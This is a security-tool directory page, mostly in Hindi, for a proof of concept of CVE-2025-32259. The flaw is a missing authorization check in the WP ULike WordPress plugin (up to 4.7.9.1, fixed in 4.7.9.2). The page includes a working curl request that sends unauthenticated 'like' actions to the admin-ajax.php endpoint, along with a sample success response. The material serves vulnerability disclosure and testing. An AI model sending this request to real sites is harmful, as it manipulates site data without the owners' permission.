Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp-ulike-cve-2025-32259-poc — In affected versions of the WP ULike plugin, there is no proper authorization check before allowing certain AJAX actions or vote manipulations. This allows unauthenticated users to interact with the plugin in ways only logged-in users should be able to — potentially skewing votes or injecting misleading data. | Kitploit
उपकरण/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

In affected versions of the WP ULike plugin, there is no proper authorization check before allowing certain AJAX actions or vote manipulations. This allows unauthenticated users to interact with the plugin in ways only logged-in users should be able to — potentially skewing votes or injecting misleading data.

1 साल पहलेअभी तक समीक्षित नहीं
साझा करें

WP ULike ≤ 4.7.9.1 - अप्रमाणित सामग्री स्पूफ (CVE-2025-32259)

🔬 WP ULike प्लगइन (WordPress) में CVE-2025-32259 को प्रदर्शित करने वाला एक सरल PoC।
🚨 केवल शैक्षिक उपयोग – बिना स्पष्ट अनुमति के सिस्टम पर परीक्षण न करें।


🧠 अवलोकन

WP ULike एक लोकप्रिय WordPress प्लगइन है जो उपयोगकर्ताओं को साइट पर सामग्री को लाइक करने की अनुमति देता है। संस्करण 4.7.9.1 तक में प्राधिकरण की कमी की भेद्यता है, जो अप्रमाणित उपयोगकर्ताओं को AJAX अनुरोधों के माध्यम से "लाइक" क्रियाओं को स्पूफ करने की अनुमति देती है।

  • CVE: CVE-2025-32259
  • असुरक्षित संस्करण: ≤ 4.7.9.1
  • ठीक किया गया संस्करण: 4.7.9.2

🚀 प्रमाण की अवधारणा (PoC)

यह भेद्यता अप्रमाणित उपयोगकर्ताओं को AJAX एंडपॉइंट के साथ इंटरैक्ट करने और बिना अनुमति के किसी भी सामग्री (पोस्ट, टिप्पणी, आदि) को लाइक करने की अनुमति देती है।

🔧 PoC स्क्रिप्ट

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

एक वैध पोस्ट ID के साथ id=1 को बदलें।

एक सफल प्रतिक्रिया इस प्रकार दिख सकती है:

root@kitploit:~
{"status":"success","msg":"You liked this."}
टूल डाउनलोड करें